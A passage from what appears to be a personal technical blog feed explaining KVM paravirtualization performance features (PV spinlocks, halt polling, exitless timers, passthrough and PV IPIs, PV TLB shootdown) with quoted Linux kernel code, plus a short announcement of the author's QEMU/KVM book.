<h4> guest side </h4>
<p>When the guest startup, ‘kvm_spinlock_init’ is used to initialize the pv spinlock.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init kvm_spinlock_init(void)
{
/* Does host kernel support KVM_FEATURE_PV_UNHALT? */
if (!kvm_para_has_feature(KVM_FEATURE_PV_UNHALT))
return;
if (kvm_para_has_hint(KVM_HINTS_REALTIME))
return;
/* Don't use the pvqspinlock code if there is only 1 vCPU. */
if (num_possible_cpus() == 1)
return;
__pv_init_lock_hash();
pv_ops.lock.queued_spin_lock_slowpath = __pv_queued_spin_lock_slowpath;
pv_ops.lock.queued_spin_unlock =
PV_CALLEE_SAVE(__pv_queued_spin_unlock);
pv_ops.lock.wait = kvm_wait;
pv_ops.lock.kick = kvm_kick_cpu;
if (kvm_para_has_feature(KVM_FEATURE_STEAL_TIME)) {
pv_ops.lock.vcpu_is_preempted =
PV_CALLEE_SAVE(__kvm_vcpu_is_preempted);
}
}
</code></pre></div></div>
<p>The most function is ‘kvm_wait’ and ‘kvm_ick_cpu’ by ‘pv_wait’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static __always_inline void pv_wait(u8 *ptr, u8 val)
{
PVOP_VCALL2(lock.wait, ptr, val);
}
</code></pre></div></div>
<p>Then it will execute the halt instruction in ‘kvm_wait’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_wait(u8 *ptr, u8 val)
{
unsigned long flags;
if (in_nmi())
return;
local_irq_save(flags);
if (READ_ONCE(*ptr) != val)
goto out;
/*
* halt until it's our turn and kicked. Note that we do safe halt
* for irq enabled case to avoid hang when lock info is overwritten
* in irq spinlock slowpath and no spurious interrupt occur to save us.
*/
if (arch_irqs_disabled_flags(flags))
halt();
else
safe_halt();
out:
local_irq_restore(flags);
}
</code></pre></div></div>
<p>When the vcpu can’t get the spinlock, it will call wait callback.
When the vcpu can get the spinlock, the ‘kick’ callback will be called by ‘pv_kick’. The ‘kvm_kick_cpu’ will be called and this trigger a KVM_HC_KICK_CPU hypercall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_kick_cpu(int cpu)
{
int apicid;
unsigned long flags = 0;
apicid = per_cpu(x86_cpu_to_apicid, cpu);
kvm_hypercall2(KVM_HC_KICK_CPU, flags, apicid);
}
</code></pre></div></div>
<h4> kvm side </h4>
<p>First of all, the kvm should expose the ‘KVM_FEATURE_PV_UNHALT’ to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
(1 << KVM_FEATURE_NOP_IO_DELAY) |
(1 << KVM_FEATURE_CLOCKSOURCE2) |
(1 << KVM_FEATURE_ASYNC_PF) |
(1 << KVM_FEATURE_PV_EOI) |
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
(1 << KVM_FEATURE_PV_UNHALT) |
...
</code></pre></div></div>
<p>When the guest execute halt instruction, the ‘kvm_emulate_halt’->’kvm_vcpu_halt’ will be called. This will set the ‘vcpu->arch.mp_state to ‘KVM_MP_STATE_HALTED’. Then ‘vcpu_block’ will be called to block this vcpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline int vcpu_block(struct kvm *kvm, struct kvm_vcpu *vcpu)
{
if (!kvm_arch_vcpu_runnable(vcpu) &&
(!kvm_x86_ops.pre_block || kvm_x86_ops.pre_block(vcpu) == 0)) {
srcu_read_unlock(&kvm->srcu, vcpu->srcu_idx);
kvm_vcpu_block(vcpu);
vcpu->srcu_idx = srcu_read_lock(&kvm->srcu);
if (kvm_x86_ops.post_block)
kvm_x86_ops.post_block(vcpu);
if (!kvm_check_request(KVM_REQ_UNHALT, vcpu))
return 1;
}
kvm_apic_accept_events(vcpu);
switch(vcpu->arch.mp_state) {
case KVM_MP_STATE_HALTED:
vcpu->arch.pv.pv_unhalted = false;
vcpu->arch.mp_state =
KVM_MP_STATE_RUNNABLE;
/* fall through */
case KVM_MP_STATE_RUNNABLE:
vcpu->arch.apf.halted = false;
break;
case KVM_MP_STATE_INIT_RECEIVED:
break;
default:
return -EINTR;
}
return 1;
}
</code></pre></div></div>
<p>When the guest trigger ‘KVM_HC_KICK_CPU’ hypercall, ‘kvm_pv_kick_cpu_op’ and ‘kvm_sched_yield’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
{
case KVM_HC_KICK_CPU:
kvm_pv_kick_cpu_op(vcpu->kvm, a0, a1);
kvm_sched_yield(vcpu->kvm, a1);
}
</code></pre></div></div>
<p>The ‘kvm_pv_kick_cpu_op’ will send an interrupt to the lapic.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_pv_kick_cpu_op(struct kvm *kvm, unsigned long flags, int apicid)
{
struct kvm_lapic_irq lapic_irq;
lapic_irq.shorthand = APIC_DEST_NOSHORT;
lapic_irq.dest_mode = APIC_DEST_PHYSICAL;
lapic_irq.level = 0;
lapic_irq.dest_id = apicid;
lapic_irq.msi_redir_hint = false;
lapic_irq.delivery_mode = APIC_DM_REMRD;
kvm_irq_delivery_to_apic(kvm, NULL, &lapic_irq, NULL);
}
</code></pre></div></div>
<p>Then in ‘__apic_accept_irq’ it will kick the blocked vcpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case APIC_DM_REMRD:
result = 1;
vcpu->arch.pv.pv_unhalted = 1;
kvm_make_request(KVM_REQ_EVENT, vcpu);
kvm_vcpu_kick(vcpu);
break;
</code></pre></div></div>
<p>The ‘kvm_vcpu_block’ returns, it will set ‘vcpu->arch.mp_state’ to ‘KVM_MP_STATE_RUNNABLE’ and let the vcpu get the spinlock.</p>
<h3> Host/Guest halt poll </h3>
<p>Under some circumstances, the overhead of context switch from ide->running or running->idle is high, especially the halt instruction.
The host halt poll is that when the vcpu execute halt instruction and cause VM-exit, in the ‘kvm_vcpu_block’ function, it will poll for conditions before giving the cpu to scheduler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (vcpu->halt_poll_ns && !kvm_arch_no_poll(vcpu)) {
ktime_t stop = ktime_add_ns(ktime_get(), vcpu->halt_poll_ns);
++vcpu->stat.halt_attempted_poll;
do {
/*
* This sets KVM_REQ_UNHALT if an interrupt
* arrives.
*/
if (kvm_vcpu_check_block(vcpu) < 0) {
++vcpu->stat.halt_successful_poll;
if (!vcpu_valid_wakeup(vcpu))
++vcpu->stat.halt_poll_invalid;
goto out;
}
poll_end = cur = ktime_get();
} while (single_task_running() && ktime_before(cur, stop));
}
</code></pre></div></div>
<p>This code is quite simple, if the condision has came, it will ‘goto out’ and the vcpu will not be blocked.</p>
<p>Guest halt poll is solution to avoid this overhead. It will poll in the guest kernel instead of the host kernel.
Compared with kvm halt poll, the guest halt poll also reduce the context switch from non-root mode to root-mode.</p>
<p>Before entering the halt, it will poll some time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int __cpuidle poll_idle(struct cpuidle_device *dev,
struct cpuidle_driver *drv, int index)
{
u64 time_start = local_clock();
dev->poll_time_limit = false;
local_irq_enable();
if (!current_set_polling_and_test()) {
unsigned int loop_count = 0;
u64 limit;
limit = cpuidle_poll_time(drv, dev);
while (!need_resched()) {
cpu_relax();
if (loop_count++ < POLL_IDLE_RELAX_COUNT)
continue;
loop_count = 0;
if (local_clock() - time_start > limit) {
dev->poll_time_limit = true;
break;
}
}
}
current_clr_polling();
return index;
}
</code></pre></div></div>
<p>When sending IPI to cpu it will check whether the poll flag is setting, if it is, it just set the ‘_TIF_NEED_RESCHED’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool set_nr_if_polling(struct task_struct *p)
{
struct thread_info *ti = task_thread_info(p);
typeof(ti->flags) old, val = READ_ONCE(ti->flags);
for (;;) {
if (!(val & _TIF_POLLING_NRFLAG))
return false;
if (val & _TIF_NEED_RESCHED)
return true;
old = cmpxchg(&ti->flags, val, val | _TIF_NEED_RESCHED);
if (old == val)
break;
val = old;
}
return true;
}
void send_call_function_single_ipi(int cpu)
{
struct rq *rq = cpu_rq(cpu);
if (!set_nr_if_polling(rq->idle))
arch_send_call_function_single_ipi(cpu);
else
trace_sched_wake_idle_without_ipi(cpu);
}
</code></pre></div></div>
<p>This will avoid the sending IPI interrupt.</p>
<p>There is a cpuid feature bit ‘KVM_FEATURE_POLL_CONTROL’ to control use which halt poll.
If this bit is set in the cpuid it means uses the host halt poll, otherwise it will uses the guest halt poll.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void arch_haltpoll_enable(unsigned int cpu)
{
if (!kvm_para_has_feature(KVM_FEATURE_POLL_CONTROL)) {
pr_err_once("kvm: host does not support poll control\n");
pr_err_once("kvm: host upgrade recommended\n");
return;
}
/* Enable guest halt poll disables host halt poll */
smp_call_function_single(cpu, kvm_disable_host_haltpoll, NULL, 1);
}
EXPORT_SYMBOL_GPL(arch_haltpoll_enable);
void arch_haltpoll_disable(unsigned int cpu)
{
if (!kvm_para_has_feature(KVM_FEATURE_POLL_CONTROL))
return;
/* Enable guest halt poll disables host halt poll */
smp_call_function_single(cpu, kvm_enable_host_haltpoll, NULL, 1);
}
</code></pre></div></div>
<h3> Disable mwait/hlt/pause </h3>
<p>In some workloads it will improve latency if the mwait/hlt/pause doesn’t cause VM-exit. The userspace(qemu) can check and set per-VM capability(KVM_CAP_X86_DISABLE_EXITS) to not intercept mwait/hlt/pause instruction.</p>
<p>‘kvm_arch’ has following fields, the userspace can set these field:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bool mwait_in_guest;
bool hlt_in_guest;
bool pause_in_guest;
bool cstate_in_guest;
</code></pre></div></div>
<p>In the VM initialization, it will check these field and set the coressponding vmcs field. For example, the mwait and hlt case.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> u32 vmx_exec_control(struct vcpu_vmx *vmx)
{
...
if (kvm_mwait_in_guest(vmx->vcpu.kvm))
exec_control &= ~(CPU_BASED_MWAIT_EXITING |
CPU_BASED_MONITOR_EXITING);
if (kvm_hlt_in_guest(vmx->vcpu.kvm))
exec_control &= ~CPU_BASED_HLT_EXITING;
return exec_control;
}
</code></pre></div></div>
<h3> Exitless timer </h3>
<p>This feature is also implemented by Wanpeng Li. Here is the <a href="https://static.sched.com/hosted_files/kvmforum2019/e3/Boosting%20Dedicated%20Instances%20by%20KVM%20Tax%20Cut.pdf">slides</a>. The patches is <a href="https://patchwork.kernel.org/cover/11033533/">here</a>.</p>
<p>Both programming timer in guest and the emulated timer fires will cause VM-exit. Exitless timer uses the housekeeping CPUs to delivery interrupt via posted-interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_timer_expired(struct kvm_lapic *apic, bool from_timer_fn)
{
struct kvm_vcpu *vcpu = apic->vcpu;
struct kvm_timer *ktimer = &apic->lapic_timer;
if (atomic_read(&apic->lapic_timer.pending))
return;
if (apic_lvtt_tscdeadline(apic) || ktimer->hv_timer_in_use)
ktimer->expired_tscdeadline = ktimer->tscdeadline;
...
if (kvm_use_posted_timer_interrupt(apic->vcpu)) {
if (apic->lapic_timer.timer_advance_ns)
__kvm_wait_lapic_expire(vcpu);
kvm_apic_inject_pending_timer_irqs(apic);
return;
}
atomic_inc(&apic->lapic_timer.pending);
kvm_set_pending_timer(vcpu);
}
</code></pre></div></div>
<p>‘kvm_apic_inject_pending_timer_irqs’ is used to inject the timer interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_apic_inject_pending_timer_irqs(struct kvm_lapic *apic)
{
struct kvm_timer *ktimer = &apic->lapic_timer;
kvm_apic_local_deliver(apic, APIC_LVTT);
if (apic_lvtt_tscdeadline(apic)) {
ktimer->tscdeadline = 0;
} else if (apic_lvtt_oneshot(apic)) {
ktimer->tscdeadline = 0;
ktimer->target_expiration = 0;
}
}
</code></pre></div></div>
<p>It just delivery a APIC_LVTT timer to the apic. It will go to the ‘case APIC_DM_FIXED’ in ‘__apic_accept_irq’ then inject the timer interrupt through posted-interrupt.</p>
My qemu/kvm book has been publicated2020-09-11T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/11/book
<p>During my study/work of virtualization, I have to dig into the code. It’s a lot of code I have to analysis, the SeaBIOS, the Linux kernel driver, the QEMU and so on.
In this exceting journey I have written a lot of virtualization-related material. A lot of people has asked me some question while reading my blog.</p>
<p>Two years ago I decided to write a qemu/kvm book, not just it can help people but also it’s a memorial of my virtualization exploration. After countless night and weekends hard working, Fianlly it comes.</p>
<p><img src="/assets/img/book/1.jpg" alt="" /></p>
<p>It’s Chinese name is 《QEMU/KVM源码解析与应用》,I think it’s English name can be ‘QEMU/KVM internals’.</p>
<p>This contains the very detailed analysis of qemu/kvm-related virtualization technologies.</p>
<ul>
<li>Basic build block such as event loop framework, thread model, qom</li>
<li>The firmware emulation, contains the SeaBIOS analysis</li>
<li>The CPU emulation, memory emulation, device emulation and interrupt emulation</li>
<li>Finally it contains some misc topic like VM migration, QGA and qemu security</li>
</ul>
<p>It can be found in following websites:</p>
<ul>
<li><a href="https://www.taobao.com/">taobao.com</a></li>
<li><a href="https://www.jd.com/">jd.com</a></li>
<li><a href="http://www.dangdang.com/">dangdang.com</a></li>
</ul>
kvm performance optimization technologies, part one2020-09-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/10/kvm-performance-1
<p>In full virtualization the guest OS doesn’t aware of it is running in an VM. If the OS knows it is running in an VM it can do some optimizations to improve the performance. This is called para virtualization(pv). From a generally speaking,
Any technology used in the guest OS that it is based the assumption that it is running in a VM can be called a pv technology. For example the virtio is a para framework, and the <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault">apf</a> is also a para feature. However in this post, I will not talk about these more complicated feature but some more small performance optimization feature in pv.</p>
<p>One of the most important thing in VM optimization is to reduce the VM-exit as much as possible, the best is there is no VM-exit.</p>
<p>This post contains the following pv optimization:</p>
<ul>
<li>Passthrough IPI</li>
<li>PV Send IPI</li>
<li>PV TLB Shootdown</li>
<li>PV sched yield</li>
<li>PV EOI</li>
</ul>
<h3> Passthrough IPI </h3>
<p>Let’s first take an example of a proposed PV feature by bytedance and also a <a href="https://dl.acm.org/doi/abs/10.1145/3381052.3381317">paper</a>.
It’s <a href="https://www.spinics.net/lists/kvm/msg224093.html">Passthrough IPI</a>.</p>
<p>When the guest issues IPI, it will write the ICR register of LAPIC. This normally causes VM-exit as the LAPIC is emulated by vmm.
‘Passthrough IPI’try to avoid this VM-exit and VM-entry by exposing the guest with posted interrupt capability. Following pic shows the basic idea which from the above paper.</p>
<p><img src="/assets/img/pvfeature/1.png" alt="" /></p>
<p>Following pic shows more detailed for this feature.</p>
<p><img src="/assets/img/pvfeature/2.png" alt="" /></p>
<h4> kvm side </h4>
<p>When creating VM, the userspace should set the gpa mapping to the pi_desc by ioctl(KVM_SET_PVIPI_ADDR).
‘vmx_set_pvipi_addr’ will set the ept table for this gpa.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int vmx_set_pvipi_addr(struct kvm *kvm, unsigned long addr)
+{
+ int ret;
+
+ if (!enable_apicv || !x2apic_enabled())
+ return 0;
+
+ if (!IS_ALIGNED(addr, PAGE_SIZE)) {
+ pr_err("addr is not aligned\n");
+ return 0;
+ }
+
+ ret = x86_set_memory_region(kvm, PVIPI_PAGE_PRIVATE_MEMSLOT, addr,
+ PAGE_SIZE * PI_DESC_PAGES);
+ if (ret)
+ return ret;
+
+ to_kvm_vmx(kvm)->pvipi_gfn = addr >> PAGE_SHIFT;
+ kvm_pvipi_init(kvm, to_kvm_vmx(kvm)->pvipi_gfn);
+
+ return ret;
+
+}
</code></pre></div></div>
<p>‘kvm_pvipi_init’ will store the pvipi addr.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +void kvm_pvipi_init(struct kvm *kvm, u64 pi_desc_gfn)
+{
+ kvm->arch.pvipi.addr = pi_desc_gfn;
+ kvm->arch.pvipi.count = PI_DESC_PAGES;
+ /* make sure addr and count is visible before set valid bit */
+ smp_wmb();
+ kvm->arch.pvipi.valid = 1;
+}
</code></pre></div></div>
<p>When creating vcpu, we setup the pi_desc page</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int pi_desc_setup(struct kvm_vcpu *vcpu)
+{
+ struct kvm_vmx *kvm_vmx = to_kvm_vmx(vcpu->kvm);
+ struct page *page;
+ int page_index, ret = 0;
+
+ page_index = vcpu->vcpu_id / PI_DESC_PER_PAGE;
+
+ /* pin pages in memory */
+ /* TODO: allow to move those page to support memory unplug.
+ * See commtnes in kvm_vcpu_reload_apic_access_page for details.
+ */
+ page = kvm_vcpu_gfn_to_page(vcpu, kvm_vmx->pvipi_gfn + page_index);
+ if (is_error_page(page)) {
+ ret = -EFAULT;
+ goto out;
+ }
+
+ to_vmx(vcpu)->pi_desc = page_address(page)
+ + vcpu->vcpu_id * PI_DESC_SIZE;
+out:
+ return ret;
+}
</code></pre></div></div>
<p>We can see this pi_desc is shared between the ‘guest’ and the vcpu struct.</p>
<p>The guest can read the ‘MSR_KVM_PV_IPI’ to get this shared pi_desc.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> + case MSR_KVM_PV_IPI:
+ msr_info->data =
+ (vcpu->kvm->arch.pvipi.msr_val & ~(u64)0x1) |
+ vcpu->arch.pvipi_enabled;
+ break;
</code></pre></div></div>
<p>The guest can write the ‘MSR_KVM_PV_IPI’ to enable/disable this feature.
If the guest disable this feature it will intercept ‘X2APIC_MSR(APIC_ICR)’ MSR
and the ‘pvipi_enabled’ is fale. If the guest enable this feature it will not
intercept the ‘X2APIC_MSR(APIC_ICR)’ MSR and this allow the guest write this MSR directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> + case MSR_KVM_PV_IPI:
+ if (!vcpu->kvm->arch.pvipi.valid)
+ break;
+
+ /* Userspace (e.g., QEMU) initiated disabling PV IPI */
+ if (msr_info->host_initiated && !(data & KVM_PV_IPI_ENABLE)) {
+ vmx_enable_intercept_for_msr(vmx->vmcs01.msr_bitmap,
+ X2APIC_MSR(APIC_ICR),
+ MSR_TYPE_RW);
+ vcpu->arch.pvipi_enabled = false;
+ pr_debug("host-initiated disabling PV IPI on vcpu %d\n",
+ vcpu->vcpu_id);
+ break;
+ }
+
+ if (!kvm_x2apic_mode(vcpu))
+ break;
+
+ if (data & KVM_PV_IPI_ENABLE && !vcpu->arch.pvipi_enabled) {
+ vmx_disable_intercept_for_msr(vmx->vmcs01.msr_bitmap,
+ X2APIC_MSR(APIC_ICR), MSR_TYPE_RW);
+ vcpu->arch.pvipi_enabled = true;
+ pr_emerg("enable pv ipi for vcpu %d\n", vcpu->vcpu_id);
+ }
+ break;
</code></pre></div></div>
<h4> guest side </h4>
<p>When gust startup it will check ‘KVM_FEATURE_PV_IPI’ feature and if it exists ‘kvm_setup_pv_ipi2’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int kvm_setup_pv_ipi2(void)
+{
+ union pvipi_msr msr;
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (msr.valid != 1)
+ return -EINVAL;
+
+ if (msr.enable) {
+ /* set enable bit and read back. */
+ wrmsrl(MSR_KVM_PV_IPI, msr.msr_val | KVM_PV_IPI_ENABLE);
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (!(msr.msr_val & KVM_PV_IPI_ENABLE)) {
+ pr_emerg("pv ipi enable failed\n");
+ iounmap(pi_desc_page);
+ return -EINVAL;
+ }
+
+ goto out;
+ } else {
+
+ pi_desc_page = ioremap_cache(msr.addr << PAGE_SHIFT,
+ PAGE_SIZE << msr.count);
+
+ if (!pi_desc_page)
+ return -ENOMEM;
+
+
+ pr_emerg("pv ipi msr val %lx, pi_desc_page %lx, %lx\n",
+ (unsigned long)msr.msr_val,
+ (unsigned long)pi_desc_page,
+ (unsigned long)&pi_desc_page[1]);
+
+ /* set enable bit and read back. */
+ wrmsrl(MSR_KVM_PV_IPI, msr.msr_val | KVM_PV_IPI_ENABLE);
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (!(msr.msr_val & KVM_PV_IPI_ENABLE)) {
+ pr_emerg("pv ipi enable failed\n");
+ iounmap(pi_desc_page);
+ return -EINVAL;
+ }
+ apic->send_IPI = kvm_send_ipi;
+ apic->send_IPI_mask = kvm_send_ipi_mask2;
+ apic->send_IPI_mask_allbutself = kvm_send_ipi_mask_allbutself2;
+ apic->send_IPI_allbutself = kvm_send_ipi_allbutself2;
+ apic->send_IPI_all = kvm_send_ipi_all2;
+ apic->icr_read = kvm_icr_read;
+ apic->icr_write = kvm_icr_write;
+ pr_emerg("pv ipi enabled\n");
+ }
+out:
+ pr_emerg("pv ipi KVM setup real PV IPIs for cpu %d\n",
+ smp_processor_id());
+
+ return 0;
}
</code></pre></div></div>
<p>This function get the shared pi_desc’s GPA and if enable case it will map this GPA to GVA by calling ‘ioremap_cache’ and then write the ‘MSR_KVM_PV_IPI’ with enable bit set. This function will also replace the apic callback to its own.</p>
<p>In order the guest will access the LAPIC’s ICR, this feature introduces a ‘MSR_KVM_PV_ICR’ MSR to expose the physical LAPIC’s ICR to the VM.</p>
<h4> guest trigger IPI </h4>
<p>When the guest send IPI the ‘kvm_send_ipi’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void kvm_send_ipi(int cpu, int vector)
+{
+ /* In x2apic mode, apicid is equal to vcpu id.*/
+ u32 vcpu_id = per_cpu(x86_cpu_to_apicid, cpu);
+ unsigned int nv, dest/* , val */;
+
+ x2apic_wrmsr_fence();
+
+ WARN(vector == NMI_VECTOR, "try to deliver NMI");
+
+ /* TODO: rollback to old approach. */
+ if (vcpu_id >= MAX_PI_DESC)
+ return;
+
+ if (pi_test_and_set_pir(vector, &pi_desc_page[vcpu_id]))
+ return;
+
+ if (pi_test_and_set_on(&pi_desc_page[vcpu_id]))
+ return;
+
+ nv = pi_desc_page[vcpu_id].nv;
+ dest = pi_desc_page[vcpu_id].ndst;
+
+ x2apic_send_IPI_dest(dest, nv, APIC_DEST_PHYSICAL);
+
+}
</code></pre></div></div>
<p>As we can see it get the ‘nv’ and ‘dest’ from the shared pi_desc page and call ‘x2apic_send_IPI_dest’ to send the pi notification vector to ‘dest’ vcpu. From the LAPIC view, this is just a posted-interrupt. If the guest is running it will trigger virtual interrupt delivery and if the guest is preempted it will be kicked to run.</p>
<h3> PV send IPI </h3>
<p>Wanpeng Li from Tencent also proposed a pv ipi feature and was merged into upstream. Following pic shows the idea from <a href="https://static.sched.com/hosted_files/kvmforum2019/e3/Boosting%20Dedicated%20Instances%20by%20KVM%20Tax%20Cut.pdf">Boosting Dedicated Instance via KVM Tax Cut</a>.</p>
<p><img src="/assets/img/pvfeature/3.png" alt="" /></p>
<p>Instead of sending the IPI to vcpu one by one, the pv ipi send uses a bitmap to to record the IPI vcpu and then make a hyper call thus reduce the VM-exit.
The patchset is <a href="https://lkml.org/lkml/2018/7/23/108">here</a>. Let’s see some detail</p>
<h4> kvm side </h4>
<p>The kvm should expose the pv send ipi feature.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @@ -621,7 +621,8 @@ static inline int __do_cpuid_ent(struct kvm_cpuid_entry2 *entry, u32 function,
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
(1 << KVM_FEATURE_PV_UNHALT) |
(1 << KVM_FEATURE_PV_TLB_FLUSH) |
- (1 << KVM_FEATURE_ASYNC_PF_VMEXIT);
+ (1 << KVM_FEATURE_ASYNC_PF_VMEXIT) |
+ (1 << KVM_FEATURE_PV_SEND_IPI);
</code></pre></div></div>
<p>The kvm side should also implement the hyper call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +/*
+ * Return 0 if successfully added and 1 if discarded.
+ */
+static int kvm_pv_send_ipi(struct kvm *kvm, unsigned long ipi_bitmap_low,
+ unsigned long ipi_bitmap_high, int min, int vector, int op_64_bit)
+{
+ int i;
+ struct kvm_apic_map *map;
+ struct kvm_vcpu *vcpu;
+ struct kvm_lapic_irq irq = {
+ .delivery_mode = APIC_DM_FIXED,
+ .vector = vector,
+ };
+ int cluster_size = op_64_bit ? 64 : 32;
+
+ rcu_read_lock();
+ map = rcu_dereference(kvm->arch.apic_map);
+
+ for_each_set_bit(i, &ipi_bitmap_low, cluster_size) {
+ vcpu = map->phys_map[min + i]->vcpu;
+ if (!kvm_apic_set_irq(vcpu, &irq, NULL))
+ return 1;
+ }
+
+ for_each_set_bit(i, &ipi_bitmap_high, cluster_size) {
+ vcpu = map->phys_map[min + i + cluster_size]->vcpu;
+ if (!kvm_apic_set_irq(vcpu, &irq, NULL))
+ return 1;
+ }
+
+ rcu_read_unlock();
+ return 0;
+}
+
void kvm_vcpu_deactivate_apicv(struct kvm_vcpu *vcpu)
{
vcpu->arch.apicv_active = false;
@@ -6739,6 +6773,9 @@ int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
case KVM_HC_CLOCK_PAIRING:
ret = kvm_pv_clock_pairing(vcpu, a0, a1);
break;
+ case KVM_HC_SEND_IPI:
+ ret = kvm_pv_send_ipi(vcpu->kvm, a0, a1, a2, a3, op_64_bit);
+ break;
#endif
</code></pre></div></div>
<p>As we can see, in the hypercall handler the ‘kvm_pv_send_ipi’ can iterate the bitmap and call ‘kvm_apic_set_irq’ to send interrupt to dest vcpu.</p>
<h4> guest side </h4>
<p>When the system startup it will check whether the ‘KVM_FEATURE_PV_SEND_IPI’ exists. If it does,
‘kvm_setup_pv_ipi’ will be called and the apic callback will be replaced to the PV IPI.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void kvm_setup_pv_ipi(void)
+{
+ apic->send_IPI_mask = kvm_send_ipi_mask;
+ apic->send_IPI_mask_allbutself = kvm_send_ipi_mask_allbutself;
+ apic->send_IPI_allbutself = kvm_send_ipi_allbutself;
+ apic->send_IPI_all = kvm_send_ipi_all;
+ pr_info("KVM setup pv IPIs\n");
+}
</code></pre></div></div>
<h4> guest trigger IPI </h4>
<p>‘__send_ipi_mask’ is called to send IPI to vcpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void __send_ipi_mask(const struct cpumask *mask, int vector)
+{
+ unsigned long flags;
+ int cpu, apic_id, min = 0, max = 0;
+#ifdef CONFIG_X86_64
+ __uint128_t ipi_bitmap = 0;
+ int cluster_size = 128;
+#else
+ u64 ipi_bitmap = 0;
+ int cluster_size = 64;
+#endif
+
+ if (cpumask_empty(mask))
+ return;
+
+ local_irq_save(flags);
+
+ for_each_cpu(cpu, mask) {
+ apic_id = per_cpu(x86_cpu_to_apicid, cpu);
+ if (!ipi_bitmap) {
+ min = max = apic_id;
+ } else if (apic_id < min && max - apic_id < cluster_size) {
+ ipi_bitmap <<= min - apic_id;
+ min = apic_id;
+ } else if (apic_id < min + cluster_size) {
+ max = apic_id < max ? max : apic_id;
+ } else {
+ kvm_hypercall4(KVM_HC_SEND_IPI, (unsigned long)ipi_bitmap,
+ (unsigned long)(ipi_bitmap >> BITS_PER_LONG), min, vector);
+ min = max = apic_id;
+ ipi_bitmap = 0;
+ }
+ __set_bit(apic_id - min, (unsigned long *)&ipi_bitmap);
+ }
+
+ if (ipi_bitmap) {
+ kvm_hypercall4(KVM_HC_SEND_IPI, (unsigned long)ipi_bitmap,
+ (unsigned long)(ipi_bitmap >> BITS_PER_LONG), min, vector);
+ }
+
+ local_irq_restore(flags);
+}
</code></pre></div></div>
<p>It will set the bitmap accross the IPI target vcpu and finally call the kvm_hypercall(KVM_HC_SEND_IPI)</p>
<h3> PV TLB Shootdown </h3>
<p>This feature is also from Wanpeng Li in tencent.</p>
<p>A TLB(translation Lookside Buffer) is a cache contains the translations from virtul memory address to physical memory address. When one CPU changes the virt-to-physical mappping. It needs to tell other CPUs to invalidate the mapping in their TLB cache. This is called TLB shootdown.</p>
<p>TLB shootdown is performance critical operation. In bare-metal it is implemented by the architecture and can be completed with very low latencies.</p>
<p>However in virtualization environment, the target vCPU can be preempted and blocked. In this scenario, the TLB flush initiator vCPU will end up busy-waiting for a long time to wait for the preempted vCPU come to run. It is unefficient.</p>
<p>In pv TLB shootdown the TLB flush initiator vCPU will not wait the sleeping vCPU instead it just set a flag in the guest-vmm shared area and then kvm will check this flag and do the TLB flush when the sleeping vCPU come to run.</p>
<h4> kvm side </h4>
<p>First as other pv optimization, we need to expose pv tlb shootdown to guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
(1 << KVM_FEATURE_NOP_IO_DELAY) |
(1 << KVM_FEATURE_CLOCKSOURCE2) |
(1 << KVM_FEATURE_ASYNC_PF) |
(1 << KVM_FEATURE_PV_EOI) |
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
